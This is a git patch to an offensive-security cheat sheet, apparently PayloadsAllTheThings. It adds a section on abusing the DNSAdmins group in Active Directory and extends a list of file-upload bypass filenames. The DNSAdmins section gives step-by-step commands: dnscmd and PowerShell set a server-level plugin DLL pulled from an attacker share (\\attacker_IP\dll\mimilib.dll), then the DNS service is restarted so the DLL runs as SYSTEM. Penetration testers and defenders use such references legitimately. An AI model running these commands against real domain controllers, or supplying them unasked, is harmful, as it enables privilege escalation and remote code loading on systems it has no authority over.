From 0c7da8ec41145ed0ae1c32bed7846f1bb84edc89 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 7 Jun 2022 20:36:09 +0200 Subject: [PATCH] DNS Admins Group --- .../Active Directory Attack.md | 34 +++++++++++++++++++ Upload Insecure Files/README.md | 6 ++-- 2 files changed, 38 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 79fe436..b909881 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -84,6 +84,7 @@ - [Certifried CVE-2022-26923](#certifried-cve-2022-26923) - [Pass-The-Certificate](#pass-the-certificate) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) + - [Abusing DNS Admins Group](#abusing-dns-admins-group) - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) - [GenericAll](#genericall) - [GenericWrite](#genericwrite) @@ -2583,6 +2584,39 @@ Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccount ``` +### Abusing DNS Admins Group + +> It is possible for the members of the DNSAdmins group to load arbitrary DLL with the privileges of dns.exe (SYSTEM). + +:warning: Require privileges to restart the DNS service. + +* Enumerate members of DNSAdmins group + ```ps1 + Get-NetGroupMember -GroupName "DNSAdmins" + Get-ADGroupMember -Identity DNSAdmins + ``` +* Change dll loaded by the DNS service + ```ps1 + # with RSAT + dnscmd /config /serverlevelplugindll \\attacker_IP\dll\mimilib.dll + dnscmd 10.10.10.11 /config /serverlevelplugindll \\10.10.10.10\exploit\privesc.dll + + # with DNSServer module + $dnsettings = Get-DnsServerSetting -ComputerName -Verbose -All + $dnsettings.ServerLevelPluginDll = "\attacker_IP\dll\mimilib.dll" + Set-DnsServerSetting -InputObject $dnsettings -ComputerName -Verbose + ``` +* Check the previous command success + ```ps1 + Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll + ``` +* Restart DNS + ```ps1 + sc \\dc01 stop dns + sc \\dc01 start dns + ``` + + ### Abusing Active Directory ACLs/ACEs Check ACL for an User with [ADACLScanner](https://github.com/canix1/ADACLScanner). diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 54b30cb..8a17f57 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -65,7 +65,8 @@ * Multiple dots : `file.php......` , in Windows when a file is created with dots at the end those will be removed. * Whitespace characters: `file.php%20`, `file.php%0d%0a.jpg` * Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`. - * Slash: `file.php/`, `file.php.\` + * Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp` + * Multiple special characters: `file.jsp/././././.` - Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif` * `Content-Type : image/gif` * `Content-Type : image/png` @@ -161,4 +162,5 @@ When a ZIP/archive file is automatically decompressed after the upload * [La PNG qui se prenait pour du PHP, 23 février 2014](https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/) * [File Upload restrictions bypass - Haboob Team](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf) * [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0) -* [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap) \ No newline at end of file +* [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap) +* [Arbitrary File Upload Tricks In Java - pyn3rd](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/) \ No newline at end of file